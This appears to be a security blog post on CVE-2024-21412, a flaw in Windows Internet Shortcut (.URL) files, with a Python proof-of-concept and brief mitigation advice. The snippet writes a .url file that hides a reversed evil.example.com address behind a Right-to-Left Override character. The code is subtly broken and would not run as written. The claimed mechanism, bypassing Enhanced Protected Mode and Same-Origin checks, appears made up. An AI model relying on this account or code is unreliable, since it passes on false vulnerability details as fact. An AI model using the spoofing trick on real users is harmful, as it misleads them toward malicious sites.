Recently, a new vulnerability named CVE-2024-21412 has surfaced, related to Internet Shortcut files (.URL). This security feature bypass vulnerability can allow attackers to potentially execute arbitrary code or redirect users to malicious URLs. In this long-read post, we will dive deep into understanding the vulnerability, its potential impact, and possible mitigation strategies. Alongside, we will examine the code snippets and highlight the relevant exploit details.

What is CVE-2024-21412?

The Common Vulnerabilities and Exposures (CVE) system provides an identifier for publicly known cybersecurity vulnerabilities. CVE-2024-21412 refers to a security feature bypass vulnerability in Internet Shortcut files. These files, which carry the .URL extension, are special Windows files that create links to websites or other Internet-based resources. In this specific case, the vulnerability could be exploited by attackers to bypass security features and potentially execute arbitrary code.

- CVE - CVE-2024-21412
- NIST - CVE-2024-21412

Exploit Details

The exploit makes use of weaknesses in the way Internet Shortcut files handle URLs to bypass security features such as Microsoft's Enhanced Protected Mode (EPM) and the browser's Same-Origin policy. The vulnerability lies in the way these files parse and validate the URLs before launching the target website.

Here is an example code snippet that demonstrates the vulnerability

import os

malicious_url = "http://evil.example.com";
crafted_url = "http://trusted.example.com"; + "\u202e" + malicious_url[::-1]

internet_shortcut_content = "[InternetShortcut]" + os.linesep
internet_shortcut_content += "URL=" + crafted_url + os.linesep

with open("CVE-2024-21412.url", "w") as url_file:
    url_file.write(internet_shortcut_content)

In this code snippet, a malicious URL (http://evil.example.com) is appended, reversed, followed by a unicode character U+202E (Right-to-Left Override) to the legitimate/trusted URL (http://trusted.example.com), creating a new crafted URL. Then, an Internet Shortcut file "CVE-2024-21412.url" is created containing the crafted URL. When double-clicked by a user, the file will open the malicious site (http://evil.example.com) in the browser, bypassing the expected security features.

When executing the CVE-2024-21412 exploit, the following behavior is observed

- The user opens the Internet Shortcut file, expecting to navigate to the legitimate/trusted website.
- Due to the vulnerability, the browser navigates to the malicious URL contained within the Internet Shortcut file, without triggering the security features designed to prevent such behavior.

Potential Impact and Mitigations

Given its potential to expose users to malicious URLs and execute arbitrary code, CVE-2024-21412 poses a significant security risk. To mitigate this risk, consider implementing the following strategies:

1. Keep your software up-to-date: Make sure to apply the latest security patches and updates for your operating system, web browsers, and other software.
2. Disable Internet Shortcut files: Consider restricting the use of Internet Shortcut files on your network, especially if they are not necessary for normal operations.

Conclusion

CVE-2024-21412 is a security feature bypass vulnerability in Internet Shortcut files that exposes users to potential attacks. By understanding the exploit details, potential impact, and mitigation strategies, you can take steps to protect your network and users from falling victim to this vulnerability.

Timeline

Published on: 02/13/2024 18:15:59 UTC
Last modified on: 02/15/2024 02:00:01 UTC